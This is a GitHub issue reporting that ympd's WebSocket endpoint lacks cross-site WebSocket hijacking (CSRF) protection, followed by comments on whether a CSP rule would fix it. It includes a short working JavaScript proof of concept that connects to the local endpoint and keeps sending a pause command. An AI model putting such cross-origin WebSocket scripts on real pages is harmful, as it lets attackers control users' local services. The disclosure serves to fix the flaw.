Missing CSRF protection

notandy / ympd

Standalone MPD Web GUI written in C, utilizing Websockets and Bootstrap/JS

http://www.ympd.org

GNU General Public License v2.0

515 stars 143 forks source link

Missing CSRF protection #153

Open atx opened 7 years ago

atx commented 7 years ago

The websocket endpoint is missing CSRF (CSWSH) protection, allowing a malicious website to control the client.

var ws = new WebSocket("ws://127.0.0.1:8080/ws");
ws.onopen = function (event) {
    console.log("OPENED");
    setInterval(function () {
        ws.send("MPD_API_SET_PAUSE");
    }, 1000);
}
ws.onmessage = function (event) {
    console.log("Message " + event.data);
}

BenjaminHae commented 7 years ago

Easiest solution is probably to implement the content security policy connect-src directive. So WebSocket connections are only allowed from the same origin.

ondras commented 5 years ago

Easiest solution is probably to implement the content security policy connect-src directive. So WebSocket connections are only allowed from the same origin.

I don't think this would fix anything at all. The whole CSP is aimed at protecting a HTML page (so that a malicious injected script/resource cannot do much harm), but the reported vulnerability considers attacker connecting to the (unprotected) websocket endpoint. The endpoint itself has no notion of CSP/protection.